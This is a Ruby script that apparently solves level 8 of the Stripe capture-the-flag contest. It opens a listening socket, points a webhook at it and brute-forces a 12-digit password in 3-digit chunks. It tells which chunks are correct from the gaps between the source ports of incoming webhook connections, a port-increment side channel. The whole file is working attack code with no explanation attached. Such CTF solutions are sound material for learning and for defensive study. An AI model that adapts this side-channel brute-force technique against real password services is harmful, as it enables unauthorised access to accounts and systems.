brute.rb

require 'socket'

last = nil
$diff = 0

server = TCPServer.new 14818
Thread.new do
  loop do
    client = server.accept
    port = client.peeraddr[1]
    
    $diff = port-last if last
    last = port
    
    #client.gets
    #client.gets
    #client.gets
    #len = client.gets.split(' ').last.to_i
    #client.gets
    #client.gets
    #puts client.read(len)
    
    client.puts "HTTP/1.0 200 OK\r\n"
    client.puts "Content-Length: 4\r\n"
    client.puts "\r\n"
    client.puts "ok\r\n"
    client.close
  end
end

require 'net/http'
require 'net/https'
$h = Net::HTTP.new('level08-4.stripe-ctf.com', 443)
$h.use_ssl = true
$h.start
$h.post '/user-vtzzwyqicq/', '{"password":"123123123123","webhooks":["level02-4.stripe-ctf.com:14818"]}'

$chunks = []

def check chunk
  chunks = $chunks + [chunk]
  chunks << '000' until chunks.size >= 4
  password = chunks.map{|c| c.to_s.rjust(3, '0')}.join
  $diff = nil
  r = $h.post('/user-vtzzwyqicq/', '{"password":"' + password + '","webhooks":["level02-4.stripe-ctf.com:14818"]}')
  sleep 0.01 until $diff
  puts "#{chunks.map{|c| c.to_s.rjust(3, '0')}.join(' ')}: #{$diff}" if $diff < 10
  
  return unless r.body.include? 'true'
  
  puts
  puts "And the password is: #{password}"
  puts
  exit
end

until $chunks.size >= 3
  goal = $chunks.size + 2
  
  chunk = 0
  while chunk < 1000
    rep = 0
    goods = 0
    
    check chunk
    while rep < 5 && $diff != goal
      check chunk
      goods += 1 if $diff == goal + 1
      rep += 1
    end
    
    if goods > 2
      puts "I think this chunk is #{chunk}"
      $chunks << chunk
      chunk = 999
    end
    
    chunk += 1
  end
end

1000.times {|chunk| check chunk } if $chunks.size == 3